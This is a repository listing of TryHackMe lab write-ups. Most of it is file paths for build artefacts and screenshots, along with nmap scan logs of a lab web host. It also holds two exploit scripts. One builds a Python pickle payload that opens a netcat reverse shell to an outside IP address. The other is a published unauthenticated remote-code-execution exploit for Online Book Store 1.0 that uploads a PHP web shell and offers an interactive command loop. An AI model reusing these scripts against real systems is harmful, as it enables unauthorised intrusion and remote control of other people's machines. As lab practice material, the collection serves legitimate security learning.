https://raw.githubusercontent.com/pamhrituc/TryHackMe_Writeups/df0a6925dabaaac077350414598c9865dfea8d3e/room_learn_rust/rust_task_4_question_2/target/rls/debug/incremental/rust_task_4_question_2-1x6ssy8b5ff00/s-fspssluejc-azjd05.lock -------------------------------------------------------------------------------- /room_learn_rust/rust_task_4_question_2/target/rls/debug/incremental/rust_task_4_question_2-1x6ssy8b5ff00/s-fspssm5x65-1todw12.lock: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/pamhrituc/TryHackMe_Writeups/df0a6925dabaaac077350414598c9865dfea8d3e/room_learn_rust/rust_task_4_question_2/target/rls/debug/incremental/rust_task_4_question_2-1x6ssy8b5ff00/s-fspssm5x65-1todw12.lock -------------------------------------------------------------------------------- /room_learn_rust/rust_task_4_question_2/target/rls/debug/incremental/rust_task_4_question_2-1x6ssy8b5ff00/s-fspssmhumr-4r6mn2.lock: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/pamhrituc/TryHackMe_Writeups/df0a6925dabaaac077350414598c9865dfea8d3e/room_learn_rust/rust_task_4_question_2/target/rls/debug/incremental/rust_task_4_question_2-1x6ssy8b5ff00/s-fspssmhumr-4r6mn2.lock -------------------------------------------------------------------------------- /room_learn_rust/rust_task_4_question_2/target/rls/debug/incremental/rust_task_4_question_2-3cls89rd51up5/s-fspssj956t-1wjcqvm.lock: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/pamhrituc/TryHackMe_Writeups/df0a6925dabaaac077350414598c9865dfea8d3e/room_learn_rust/rust_task_4_question_2/target/rls/debug/incremental/rust_task_4_question_2-3cls89rd51up5/s-fspssj956t-1wjcqvm.lock -------------------------------------------------------------------------------- /room_learn_rust/rust_task_4_question_2/target/rls/debug/incremental/rust_task_4_question_2-3cls89rd51up5/s-fspssk4c3n-ixidc3.lock: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/pamhrituc/TryHackMe_Writeups/df0a6925dabaaac077350414598c9865dfea8d3e/room_learn_rust/rust_task_4_question_2/target/rls/debug/incremental/rust_task_4_question_2-3cls89rd51up5/s-fspssk4c3n-ixidc3.lock -------------------------------------------------------------------------------- /room_learn_rust/rust_task_4_question_2/target/rls/debug/incremental/rust_task_4_question_2-3cls89rd51up5/s-fspsskbe5i-g4ztti.lock: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/pamhrituc/TryHackMe_Writeups/df0a6925dabaaac077350414598c9865dfea8d3e/room_learn_rust/rust_task_4_question_2/target/rls/debug/incremental/rust_task_4_question_2-3cls89rd51up5/s-fspsskbe5i-g4ztti.lock -------------------------------------------------------------------------------- /room_learn_rust/rust_task_4_question_2/target/rls/debug/incremental/rust_task_4_question_2-3cls89rd51up5/s-fspsslethn-pau2rl.lock: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/pamhrituc/TryHackMe_Writeups/df0a6925dabaaac077350414598c9865dfea8d3e/room_learn_rust/rust_task_4_question_2/target/rls/debug/incremental/rust_task_4_question_2-3cls89rd51up5/s-fspsslethn-pau2rl.lock -------------------------------------------------------------------------------- /room_learn_rust/rust_task_4_question_2/target/rls/debug/incremental/rust_task_4_question_2-3cls89rd51up5/s-fspsslp6my-1gqs261.lock: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/pamhrituc/TryHackMe_Writeups/df0a6925dabaaac077350414598c9865dfea8d3e/room_learn_rust/rust_task_4_question_2/target/rls/debug/incremental/rust_task_4_question_2-3cls89rd51up5/s-fspsslp6my-1gqs261.lock -------------------------------------------------------------------------------- /room_learn_rust/rust_task_4_question_2/target/rls/debug/incremental/rust_task_4_question_2-3cls89rd51up5/s-fspssm4ryt-1ukv4xe.lock: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/pamhrituc/TryHackMe_Writeups/df0a6925dabaaac077350414598c9865dfea8d3e/room_learn_rust/rust_task_4_question_2/target/rls/debug/incremental/rust_task_4_question_2-3cls89rd51up5/s-fspssm4ryt-1ukv4xe.lock -------------------------------------------------------------------------------- /room_learn_rust/rust_task_4_question_2/target/rls/debug/incremental/rust_task_4_question_2-3cls89rd51up5/s-fspssmg6f8-bi227v.lock: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/pamhrituc/TryHackMe_Writeups/df0a6925dabaaac077350414598c9865dfea8d3e/room_learn_rust/rust_task_4_question_2/target/rls/debug/incremental/rust_task_4_question_2-3cls89rd51up5/s-fspssmg6f8-bi227v.lock -------------------------------------------------------------------------------- /room_learn_rust/screenshots/41.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/pamhrituc/TryHackMe_Writeups/df0a6925dabaaac077350414598c9865dfea8d3e/room_learn_rust/screenshots/41.png -------------------------------------------------------------------------------- /room_learn_rust/screenshots/42.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/pamhrituc/TryHackMe_Writeups/df0a6925dabaaac077350414598c9865dfea8d3e/room_learn_rust/screenshots/42.png -------------------------------------------------------------------------------- /room_learn_rust/speed_meter.jpeg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/pamhrituc/TryHackMe_Writeups/df0a6925dabaaac077350414598c9865dfea8d3e/room_learn_rust/speed_meter.jpeg -------------------------------------------------------------------------------- /room_learn_rust/tablet.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/pamhrituc/TryHackMe_Writeups/df0a6925dabaaac077350414598c9865dfea8d3e/room_learn_rust/tablet.png -------------------------------------------------------------------------------- /room_metasploit/screenshots/autoroute.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/pamhrituc/TryHackMe_Writeups/df0a6925dabaaac077350414598c9865dfea8d3e/room_metasploit/screenshots/autoroute.png -------------------------------------------------------------------------------- /room_metasploit/screenshots/checkvm.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/pamhrituc/TryHackMe_Writeups/df0a6925dabaaac077350414598c9865dfea8d3e/room_metasploit/screenshots/checkvm.png -------------------------------------------------------------------------------- /room_metasploit/screenshots/exploit_suggester.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/pamhrituc/TryHackMe_Writeups/df0a6925dabaaac077350414598c9865dfea8d3e/room_metasploit/screenshots/exploit_suggester.png -------------------------------------------------------------------------------- /room_metasploit/screenshots/getuid.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/pamhrituc/TryHackMe_Writeups/df0a6925dabaaac077350414598c9865dfea8d3e/room_metasploit/screenshots/getuid.png -------------------------------------------------------------------------------- /room_metasploit/screenshots/kiwi.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/pamhrituc/TryHackMe_Writeups/df0a6925dabaaac077350414598c9865dfea8d3e/room_metasploit/screenshots/kiwi.png -------------------------------------------------------------------------------- /room_metasploit/screenshots/metasploit_modules.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/pamhrituc/TryHackMe_Writeups/df0a6925dabaaac077350414598c9865dfea8d3e/room_metasploit/screenshots/metasploit_modules.png -------------------------------------------------------------------------------- /room_metasploit/screenshots/prev2_1.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/pamhrituc/TryHackMe_Writeups/df0a6925dabaaac077350414598c9865dfea8d3e/room_metasploit/screenshots/prev2_1.png -------------------------------------------------------------------------------- /room_metasploit/screenshots/prev2_2.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/pamhrituc/TryHackMe_Writeups/df0a6925dabaaac077350414598c9865dfea8d3e/room_metasploit/screenshots/prev2_2.png -------------------------------------------------------------------------------- /room_metasploit/screenshots/privs.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/pamhrituc/TryHackMe_Writeups/df0a6925dabaaac077350414598c9865dfea8d3e/room_metasploit/screenshots/privs.png -------------------------------------------------------------------------------- /room_metasploit/screenshots/ps1.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/pamhrituc/TryHackMe_Writeups/df0a6925dabaaac077350414598c9865dfea8d3e/room_metasploit/screenshots/ps1.png -------------------------------------------------------------------------------- /room_metasploit/screenshots/ps2.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/pamhrituc/TryHackMe_Writeups/df0a6925dabaaac077350414598c9865dfea8d3e/room_metasploit/screenshots/ps2.png -------------------------------------------------------------------------------- /room_metasploit/screenshots/rhosts.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/pamhrituc/TryHackMe_Writeups/df0a6925dabaaac077350414598c9865dfea8d3e/room_metasploit/screenshots/rhosts.png -------------------------------------------------------------------------------- /room_metasploit/screenshots/scan.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/pamhrituc/TryHackMe_Writeups/df0a6925dabaaac077350414598c9865dfea8d3e/room_metasploit/screenshots/scan.png -------------------------------------------------------------------------------- /room_metasploit/screenshots/services.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/pamhrituc/TryHackMe_Writeups/df0a6925dabaaac077350414598c9865dfea8d3e/room_metasploit/screenshots/services.png -------------------------------------------------------------------------------- /room_metasploit/screenshots/sessions.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/pamhrituc/TryHackMe_Writeups/df0a6925dabaaac077350414598c9865dfea8d3e/room_metasploit/screenshots/sessions.png -------------------------------------------------------------------------------- /room_metasploit/screenshots/sysinfo.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/pamhrituc/TryHackMe_Writeups/df0a6925dabaaac077350414598c9865dfea8d3e/room_metasploit/screenshots/sysinfo.png -------------------------------------------------------------------------------- /room_nmap_scan_results/aggressive_scan.log: -------------------------------------------------------------------------------- 1 | # Nmap 7.80 scan initiated Wed Sep 16 12:05:05 2020 as: nmap -A -oN aggressive_scan.log 10.10.7.229 2 | Nmap scan report for 10.10.7.229 3 | Host is up (0.23s latency). 4 | Not shown: 998 closed ports 5 | PORT STATE SERVICE VERSION 6 | 22/tcp open ssh OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.10 (Ubuntu Linux; protocol 2.0) 7 | | ssh-hostkey: 8 | | 1024 4c:9b:47:e8:c5:83:85:53:5c:8d:ee:09:c3:87:09:1c (DSA) 9 | | 2048 05:d0:60:64:00:d8:8d:01:01:9b:51:40:bf:f3:27:87 (RSA) 10 | | 256 d9:99:e4:87:c7:72:bd:0b:9d:95:9f:f0:1d:f4:c2:32 (ECDSA) 11 | |_ 256 b0:d5:b5:4d:03:29:05:60:48:95:9b:b6:19:87:d0:7c (ED25519) 12 | 80/tcp open http Apache httpd 2.4.7 ((Ubuntu)) 13 | | http-cookie-flags: 14 | | /: 15 | | PHPSESSID: 16 | |_ httponly flag not set 17 | | http-robots.txt: 1 disallowed entry 18 | |_/ 19 | |_http-server-header: Apache/2.4.7 (Ubuntu) 20 | | http-title: Login :: Damn Vulnerable Web Application (DVWA) v1.10 *Develop... 21 | |_Requested resource was login.php 22 | No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ). 23 | TCP/IP fingerprint: 24 | OS:SCAN(V=7.80%E=4%D=9/16%OT=22%CT=1%CU=43906%PV=Y%DS=4%DC=T%G=Y%TM=5F61D57 25 | OS:6%P=x86_64-pc-linux-gnu)SEQ(SP=F5%GCD=1%ISR=103%TI=Z%CI=I%II=I%TS=8)OPS( 26 | OS:O1=M509ST11NW6%O2=M509ST11NW6%O3=M509NNT11NW6%O4=M509ST11NW6%O5=M509ST11 27 | OS:NW6%O6=M509ST11)WIN(W1=68DF%W2=68DF%W3=68DF%W4=68DF%W5=68DF%W6=68DF)ECN( 28 | OS:R=Y%DF=Y%T=40%W=6903%O=M509NNSNW6%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=AS 29 | OS:%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(R= 30 | OS:Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F= 31 | OS:R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%T 32 | OS:=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%CD= 33 | OS:S) 34 | 35 | Network Distance: 4 hops 36 | Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel 37 | 38 | TRACEROUTE (using port 587/tcp) 39 | HOP RTT ADDRESS 40 | 1 164.34 ms 10.6.0.1 41 | 2 ... 3 42 | 4 234.00 ms 10.10.7.229 43 | 44 | OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . 45 | # Nmap done at Wed Sep 16 12:05:58 2020 -- 1 IP address (1 host up) scanned in 54.09 seconds 46 | -------------------------------------------------------------------------------- /room_nmap_scan_results/service_version_detection.log: -------------------------------------------------------------------------------- 1 | # Nmap 7.80 scan initiated Wed Sep 16 12:03:26 2020 as: nmap -sV -oN service_version_detection.log 10.10.7.229 2 | Nmap scan report for 10.10.7.229 3 | Host is up (0.23s latency). 4 | Not shown: 998 closed ports 5 | PORT STATE SERVICE VERSION 6 | 22/tcp open ssh OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.10 (Ubuntu Linux; protocol 2.0) 7 | 80/tcp open http Apache httpd 2.4.7 ((Ubuntu)) 8 | Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel 9 | 10 | Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . 11 | # Nmap done at Wed Sep 16 12:03:59 2020 -- 1 IP address (1 host up) scanned in 32.91 seconds 12 | -------------------------------------------------------------------------------- /room_nmap_scan_results/syn_scan.log: -------------------------------------------------------------------------------- 1 | # Nmap 7.80 scan initiated Wed Sep 16 12:02:17 2020 as: nmap -sS -oN syn_scan.log 10.10.7.229 2 | Nmap scan report for 10.10.7.229 3 | Host is up (0.23s latency). 4 | Not shown: 998 closed ports 5 | PORT STATE SERVICE 6 | 22/tcp open ssh 7 | 80/tcp open http 8 | 9 | # Nmap done at Wed Sep 16 12:02:34 2020 -- 1 IP address (1 host up) scanned in 16.99 seconds 10 | -------------------------------------------------------------------------------- /room_nmap_scan_results/vuln_scan.log: -------------------------------------------------------------------------------- 1 | # Nmap 7.80 scan initiated Wed Sep 16 12:08:18 2020 as: nmap --script vuln -oN vuln_scan.log 10.10.7.229 2 | Nmap scan report for 10.10.7.229 3 | Host is up (0.23s latency). 4 | Not shown: 998 closed ports 5 | PORT STATE SERVICE 6 | 22/tcp open ssh 7 | |_clamav-exec: ERROR: Script execution failed (use -d to debug) 8 | 80/tcp open http 9 | |_clamav-exec: ERROR: Script execution failed (use -d to debug) 10 | | http-cookie-flags: 11 | | /: 12 | | PHPSESSID: 13 | | httponly flag not set 14 | | /login.php: 15 | | PHPSESSID: 16 | |_ httponly flag not set 17 | |_http-csrf: Couldn't find any CSRF vulnerabilities. 18 | |_http-dombased-xss: Couldn't find any DOM based XSS. 19 | | http-enum: 20 | | /login.php: Possible admin folder 21 | | /robots.txt: Robots file 22 | | /config/: Potentially interesting directory w/ listing on 'apache/2.4.7 (ubuntu)' 23 | | /docs/: Potentially interesting directory w/ listing on 'apache/2.4.7 (ubuntu)' 24 | |_ /external/: Potentially interesting directory w/ listing on 'apache/2.4.7 (ubuntu)' 25 | | http-slowloris-check: 26 | | VULNERABLE: 27 | | Slowloris DOS attack 28 | | State: LIKELY VULNERABLE 29 | | IDs: CVE:CVE-2007-6750 30 | | Slowloris tries to keep many connections to the target web server open and hold 31 | | them open as long as possible. It accomplishes this by opening connections to 32 | | the target web server and sending a partial request. By doing so, it starves 33 | | the http server's resources causing Denial Of Service. 34 | | 35 | | Disclosure date: 2009-09-17 36 | | References: 37 | | http://ha.ckers.org/slowloris/ 38 | |_ https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6750 39 | |_http-stored-xss: Couldn't find any stored XSS vulnerabilities. 40 | 41 | # Nmap done at Wed Sep 16 12:13:58 2020 -- 1 IP address (1 host up) scanned in 340.11 seconds 42 | -------------------------------------------------------------------------------- /room_ohsint/WindowsXP.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/pamhrituc/TryHackMe_Writeups/df0a6925dabaaac077350414598c9865dfea8d3e/room_ohsint/WindowsXP.jpg -------------------------------------------------------------------------------- /room_ohsint/screenshots/blog.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/pamhrituc/TryHackMe_Writeups/df0a6925dabaaac077350414598c9865dfea8d3e/room_ohsint/screenshots/blog.png -------------------------------------------------------------------------------- /room_ohsint/screenshots/exiftool.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/pamhrituc/TryHackMe_Writeups/df0a6925dabaaac077350414598c9865dfea8d3e/room_ohsint/screenshots/exiftool.png -------------------------------------------------------------------------------- /room_ohsint/screenshots/github.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/pamhrituc/TryHackMe_Writeups/df0a6925dabaaac077350414598c9865dfea8d3e/room_ohsint/screenshots/github.png -------------------------------------------------------------------------------- /room_ohsint/screenshots/twitter.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/pamhrituc/TryHackMe_Writeups/df0a6925dabaaac077350414598c9865dfea8d3e/room_ohsint/screenshots/twitter.png -------------------------------------------------------------------------------- /room_ohsint/screenshots/wigle.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/pamhrituc/TryHackMe_Writeups/df0a6925dabaaac077350414598c9865dfea8d3e/room_ohsint/screenshots/wigle.png -------------------------------------------------------------------------------- /room_owasp/day03/webapp.db: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/pamhrituc/TryHackMe_Writeups/df0a6925dabaaac077350414598c9865dfea8d3e/room_owasp/day03/webapp.db -------------------------------------------------------------------------------- /room_owasp/day08/rce.py: -------------------------------------------------------------------------------- 1 | import pickle 2 | import sys 3 | import base64 4 | 5 | command = 'rm /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/sh -i 2>&1 | nc 10.6.16.114 727 > /tmp/f' 6 | 7 | class rce(object): 8 | def __reduce__(self): 9 | import os 10 | return (os.system,(command,)) 11 | 12 | print(base64.b64encode(pickle.dumps(rce()))) 13 | -------------------------------------------------------------------------------- /room_owasp/day09/rce.py: -------------------------------------------------------------------------------- 1 | # Exploit Title: Online Book Store 1.0 - Unauthenticated Remote Code Execution 2 | # Google Dork: N/A 3 | # Date: 2020-01-07 4 | # Exploit Author: Tib3rius 5 | # Vendor Homepage: https://projectworlds.in/free-projects/php-projects/online-book-store-project-in-php/ 6 | # Software Link: https://github.com/projectworlds32/online-book-store-project-in-php/archive/master.zip 7 | # Version: 1.0 8 | # Tested on: Ubuntu 16.04 9 | # CVE: N/A 10 | 11 | import argparse 12 | import random 13 | import requests 14 | import string 15 | import sys 16 | 17 | parser = argparse.ArgumentParser() 18 | parser.add_argument('url', action='store', help='The URL of the target.') 19 | args = parser.parse_args() 20 | 21 | url = args.url.rstrip('/') 22 | random_file = ''.join(random.choice(string.ascii_letters + string.digits) for i in range(10)) 23 | 24 | payload = '' 25 | 26 | file = {'image': (random_file + '.php', payload, 'text/php')} 27 | print('> Attempting to upload PHP web shell...') 28 | r = requests.post(url + '/admin_add.php', files=file, data={'add':'1'}, verify=False) 29 | print('> Verifying shell upload...') 30 | r = requests.get(url + '/bootstrap/img/' + random_file + '.php', params={'cmd':'echo ' + random_file}, verify=False) 31 | 32 | if random_file in r.text: 33 | print('> Web shell uploaded to ' + url + '/bootstrap/img/' + random_file + '.php') 34 | print('> Example command usage: ' + url + '/bootstrap/img/' + random_file + '.php?cmd=whoami') 35 | launch_shell = str(input('> Do you wish to launch a shell here? (y/n): ')) 36 | if launch_shell.lower() == 'y': 37 | while True: 38 | cmd = str(input('RCE $ ')) 39 | if cmd == 'exit': 40 | sys.exit(0) 41 | r = requests.get(url + '/bootstrap/img/' + random_file + '.php', params={'cmd':cmd}, verify=False) 42 | print(r.text) 43 | else: 44 | if r.status_code == 200: 45 | print('> Web shell uploaded to ' + url + '/bootstrap/img/' + random_file + '.php, however a simple command check failed to execute. Perhaps shell_exec is disabled? Try changing the payload.') 46 | else: 47 | print('> Web shell failed to upload! The web server may not have write permissions.') -------------------------------------------------------------------------------- /room_owasp/day10/login-logs.txt: -------------------------------------------------------------------------------- 1 | 200 OK 12.55.22.88 jr22 2019-03-18T09:21:17 /login 2 | 200 OK 14.56.23.11 rand99 2019-03-18T10:19:22 /login 3 | 200 OK 17.33.10.38 afer11 2019-03-18T11:11:44 /login 4 | 200 OK 99.12.44.20 rad4 2019-03-18T11:55:51 /login 5 | 200 OK 67.34.22.10 bff1 2019-03-18T13:08:59 /login 6 | 200 OK 34.55.11.14 hax0r 2019-03-21T16:08:15 /login 7 | 401 Unauthorised 49.99.13.16 admin 2019-03-21T21:08:15 /login 8 | 401 Unauthorised 49.99.13.16 administrator 2019-03-21T21:08:20 /login 9 | 401 Unauthorised 49.99.13.16 anonymous 2019-03-21T21:08:25 /login 10 | 401 Unauthorised 49.99.13.16 root 2019-03-21T21:08:30 /login -------------------------------------------------------------------------------- /room_owasp/screenshots/day01/home.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/pamhrituc/TryHackMe_Writeups/df0a6925dabaaac077350414598c9865dfea8d3e/room_owasp/screenshots/day01/home.png -------------------------------------------------------------------------------- /room_owasp/screenshots/day01/ls.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/pamhrituc/TryHackMe_Writeups/df0a6925dabaaac077350414598c9865dfea8d3e/room_owasp/screenshots/day01/ls.png -------------------------------------------------------------------------------- /room_owasp/screenshots/day01/motd_1.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/pamhrituc/TryHackMe_Writeups/df0a6925dabaaac077350414598c9865dfea8d3e/room_owasp/screenshots/day01/motd_1.png -------------------------------------------------------------------------------- /room_owasp/screenshots/day01/motd_2.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/pamhrituc/TryHackMe_Writeups/df0a6925dabaaac077350414598c9865dfea8d3e/room_owasp/screenshots/day01/motd_2.png -------------------------------------------------------------------------------- /room_owasp/screenshots/day01/release.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/pamhrituc/TryHackMe_Writeups/df0a6925dabaaac077350414598c9865dfea8d3e/room_owasp/screenshots/day01/release.png -------------------------------------------------------------------------------- /room_owasp/screenshots/day01/shell.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/pamhrituc/TryHackMe_Writeups/df0a6925dabaaac077350414598c9865dfea8d3e/room_owasp/screenshots/day01/shell.png -------------------------------------------------------------------------------- /room_owasp/screenshots/day01/whoami.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/pamhrituc/TryHackMe_Writeups/df0a6925dabaaac077350414598c9865dfea8d3e/room_owasp/screenshots/day01/whoami.png -------------------------------------------------------------------------------- /room_owasp/screenshots/day02/darren.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/pamhrituc/TryHackMe_Writeups/df0a6925dabaaac077350414598c9865dfea8d3e/room_owasp/screenshots/day02/darren.png -------------------------------------------------------------------------------- /room_owasp/screenshots/day02/flag.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/pamhrituc/TryHackMe_Writeups/df0a6925dabaaac077350414598c9865dfea8d3e/room_owasp/screenshots/day02/flag.png -------------------------------------------------------------------------------- /room_owasp/screenshots/day03/assets.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/pamhrituc/TryHackMe_Writeups/df0a6925dabaaac077350414598c9865dfea8d3e/room_owasp/screenshots/day03/assets.png -------------------------------------------------------------------------------- /room_owasp/screenshots/day03/commands.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/pamhrituc/TryHackMe_Writeups/df0a6925dabaaac077350414598c9865dfea8d3e/room_owasp/screenshots/day03/commands.png -------------------------------------------------------------------------------- /room_owasp/screenshots/day03/flag.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/pamhrituc/TryHackMe_Writeups/df0a6925dabaaac077350414598c9865dfea8d3e/room_owasp/screenshots/day03/flag.png -------------------------------------------------------------------------------- /room_owasp/screenshots/day04/name.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/pamhrituc/TryHackMe_Writeups/df0a6925dabaaac077350414598c9865dfea8d3e/room_owasp/screenshots/day04/name.png -------------------------------------------------------------------------------- /room_owasp/screenshots/day04/ssh.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/pamhrituc/TryHackMe_Writeups/df0a6925dabaaac077350414598c9865dfea8d3e/room_owasp/screenshots/day04/ssh.png -------------------------------------------------------------------------------- /room_owasp/screenshots/day04/xxe_1.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/pamhrituc/TryHackMe_Writeups/df0a6925dabaaac077350414598c9865dfea8d3e/room_owasp/screenshots/day04/xxe_1.png -------------------------------------------------------------------------------- /room_owasp/screenshots/day04/xxe_2.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/pamhrituc/TryHackMe_Writeups/df0a6925dabaaac077350414598c9865dfea8d3e/room_owasp/screenshots/day04/xxe_2.png -------------------------------------------------------------------------------- /room_owasp/screenshots/day05/flag.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/pamhrituc/TryHackMe_Writeups/df0a6925dabaaac077350414598c9865dfea8d3e/room_owasp/screenshots/day05/flag.png -------------------------------------------------------------------------------- /room_owasp/screenshots/day05/logged.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/pamhrituc/TryHackMe_Writeups/df0a6925dabaaac077350414598c9865dfea8d3e/room_owasp/screenshots/day05/logged.png -------------------------------------------------------------------------------- /room_owasp/screenshots/day05/login.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/pamhrituc/TryHackMe_Writeups/df0a6925dabaaac077350414598c9865dfea8d3e/room_owasp/screenshots/day05/login.png -------------------------------------------------------------------------------- /room_owasp/screenshots/day06/flag.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/pamhrituc/TryHackMe_Writeups/df0a6925dabaaac077350414598c9865dfea8d3e/room_owasp/screenshots/day06/flag.png -------------------------------------------------------------------------------- /room_owasp/screenshots/day06/github.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/pamhrituc/TryHackMe_Writeups/df0a6925dabaaac077350414598c9865dfea8d3e/room_owasp/screenshots/day06/github.png -------------------------------------------------------------------------------- /room_owasp/screenshots/day06/notes.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/pamhrituc/TryHackMe_Writeups/df0a6925dabaaac077350414598c9865dfea8d3e/room_owasp/screenshots/day06/notes.png -------------------------------------------------------------------------------- /room_owasp/screenshots/day07/reflective11.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/pamhrituc/TryHackMe_Writeups/df0a6925dabaaac077350414598c9865dfea8d3e/room_owasp/screenshots/day07/reflective11.png -------------------------------------------------------------------------------- /room_owasp/screenshots/day07/reflective12.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/pamhrituc/TryHackMe_Writeups/df0a6925dabaaac077350414598c9865dfea8d3e/room_owasp/screenshots/day07/reflective12.png -------------------------------------------------------------------------------- /room_owasp/screenshots/day07/reflective13.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/pamhrituc/TryHackMe_Writeups/df0a6925dabaaac077350414598c9865dfea8d3e/room_owasp/screenshots/day07/reflective13.png -------------------------------------------------------------------------------- /room_owasp/screenshots/day07/reflective21.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/pamhrituc/TryHackMe_Writeups/df0a6925dabaaac077350414598c9865dfea8d3e/room_owasp/screenshots/day07/reflective21.png -------------------------------------------------------------------------------- /room_owasp/screenshots/day07/reflective22.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/pamhrituc/TryHackMe_Writeups/df0a6925dabaaac077350414598c9865dfea8d3e/room_owasp/screenshots/day07/reflective22.png -------------------------------------------------------------------------------- /room_owasp/screenshots/day07/reflective23.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/pamhrituc/TryHackMe_Writeups/df0a6925dabaaac077350414598c9865dfea8d3e/room_owasp/screenshots/day07/reflective23.png -------------------------------------------------------------------------------- /room_owasp/screenshots/day07/stored11.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/pamhrituc/TryHackMe_Writeups/df0a6925dabaaac077350414598c9865dfea8d3e/room_owasp/screenshots/day07/stored11.png -------------------------------------------------------------------------------- /room_owasp/screenshots/day07/stored12.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/pamhrituc/TryHackMe_Writeups/df0a6925dabaaac077350414598c9865dfea8d3e/room_owasp/screenshots/day07/stored12.png -------------------------------------------------------------------------------- /room_owasp/screenshots/day07/stored21.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/pamhrituc/TryHackMe_Writeups/df0a6925dabaaac077350414598c9865dfea8d3e/room_owasp/screenshots/day07/stored21.png -------------------------------------------------------------------------------- /room_owasp/screenshots/day07/stored22.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/pamhrituc/TryHackMe_Writeups/df0a6925dabaaac077350414598c9865dfea8d3e/room_owasp/screenshots/day07/stored22.png -------------------------------------------------------------------------------- /room_owasp/screenshots/day07/stored23.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/pamhrituc/TryHackMe_Writeups/df0a6925dabaaac077350414598c9865dfea8d3e/room_owasp/screenshots/day07/stored23.png -------------------------------------------------------------------------------- /room_owasp/screenshots/day07/stored31.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/pamhrituc/TryHackMe_Writeups/df0a6925dabaaac077350414598c9865dfea8d3e/room_owasp/screenshots/day07/stored31.png -------------------------------------------------------------------------------- /room_owasp/screenshots/day07/stored32.png: -------------------------------------------------------------------------------- 